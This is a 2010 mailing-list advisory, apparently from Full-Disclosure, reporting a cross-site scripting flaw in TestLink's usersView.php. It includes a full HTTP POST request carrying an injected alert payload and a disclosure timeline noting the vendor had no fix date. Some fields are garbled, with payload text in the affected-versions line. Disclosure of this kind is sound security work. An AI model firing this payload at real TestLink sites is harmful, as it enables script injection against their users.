lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20100115112718.55051.qmail@f4mail-235-240.rediffmail.com>
Date: 15 Jan 2010 11:27:18 -0000
From: "Prashant " <clickprashant@...iffmail.com>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.grok.org.uk>
Subject: Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System

1.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System.
Discovered by: Prashant Khandelwal (clickprashant@...il.com)

 
2.Vulnerability Information
  Class: Cross site scriping
  Impact :Code execution
  Remotely Exploitable: Yes
  Locally Exploitable: No


3. Vulnerable packages.

   Versions affected :All versions ">alert(726367128870)%3B

   Request
 
   POST /testlink/lib/usermanagement/usersView.php HTTP/1.0

   Accept: */*
   Content-Type: application/x-www-form-urlencoded
   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
   Host: x.x.x.x
   Content-Length: 146
   Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
   Connection: Close
   Pragma: no-cache

   operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login


5. Proof Of Concept


======================
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant@...il.com]
# Cross site scripting in Testlink the Test Management Tool

# Vendor : Testlink http://www.teamst.org
# Affected Version : userView.php

echo "Please open userView.php in browser a java script alert with  text 123456789  should pop up"


=====================


6. Report Timeline

I)  5-Jan-2010
    Vulnerability dicovered

II) 11-Jan-2010

    Notified about the vulnerability to the developer Francisco Mancardi & Martin Havlat from testlink team

IV) 11-Jan-2010
    Francisco Mancardi ask for POC.

V)  14-Jan-2010
    POC's given

VI) 15-Jan-2010
    Francisco Mancardi says these vulnerabilities cannot be patched at the moment and has not commited any timeline for fixing the same.
   
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ